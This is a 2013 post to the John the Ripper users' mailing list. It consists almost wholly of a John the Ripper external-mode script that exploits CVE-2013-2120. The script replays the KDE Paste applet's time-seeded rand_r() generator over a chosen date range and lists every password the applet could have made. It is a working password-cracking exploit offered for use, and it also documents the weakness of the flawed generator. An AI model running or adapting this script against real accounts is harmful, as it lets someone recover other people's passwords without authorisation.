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Message-ID: <CACYkhxjm1wQd5ptk4eKcdX2YzFw5f4NDbrSv0k92Qbp+qgU1Wg@mail.gmail.com> Date: Tue, 11 Jun 2013 14:22:50 +1000 From: Michael Samuel <mik@...net.net> To: john-users@...ts.openwall.com Subject: KDE Paste Applet external mode This takes advantage of CVE-2013-2120 to find seeds that KDE Paste applet uses to generate passwords. [List.External:KDEPaste] int charset[95]; int charset_length, password_length, endTime, startTime, msec; void init() { password_length = 8; /* Change this to match config */ endTime = 1375279200; /* Aug 1 2013 - Change this as necessary */ startTime = 1343743200; /* Aug 1 2012 - Change this as necessary */ msec = 1; /* msec is never 0 - it would crash the applet */ charset_length = 0; int c; /* Comment out classes that you don't need, but keep the order the same */ /* Lowers */ c = 'a'; while (c <= 'z') charset[charset_length++] = c++; /* Uppers */ c = 'A'; while (c <= 'Z') charset[charset_length++] = c++; /* Numbers */ c = '0'; while (c <= '9') charset[charset_length++] = c++; charset[charset_length++] = '0'; /* Yep, it's there twice */ /* Symbols */ c = '!'; while (c <= '/') charset[charset_length++] = c++; c = ':'; while (c <= '@') charset[charset_length++] = c++; c = '['; while (c <= '`') charset[charset_length++] = c++; c = '{'; while (c <= '~') charset[charset_length++] = c++; } void generate() { int i, rand_seed, rand_result; /* Terminate once we've generated for all * * of the time range (Plus a bit more...) */ if (endTime + 1000 < startTime) { word = 0; return; } /* Skip msecs that would generate dupes */ while(endTime % msec != 0) { if(++msec > 999) { endTime--; msec = 1; } } rand_seed = endTime / msec; i = 0; while(i < password_length) { /* This is rand_r() as used in eglibc */ rand_seed *= 1103515245; rand_seed += 12345; rand_result = (rand_seed >> 16) & 2047; rand_seed *= 1103515245; rand_seed += 12345; rand_result <<= 10; rand_result ^= (rand_seed >> 16) & 1023; rand_seed *= 1103515245; rand_seed += 12345; rand_result <<= 10; rand_result ^= (rand_seed >> 16) & 1023; word[i++] = charset[rand_result % charset_length]; } word[i] = 0; if(++msec > 999) { endTime--; msec = 1; } }
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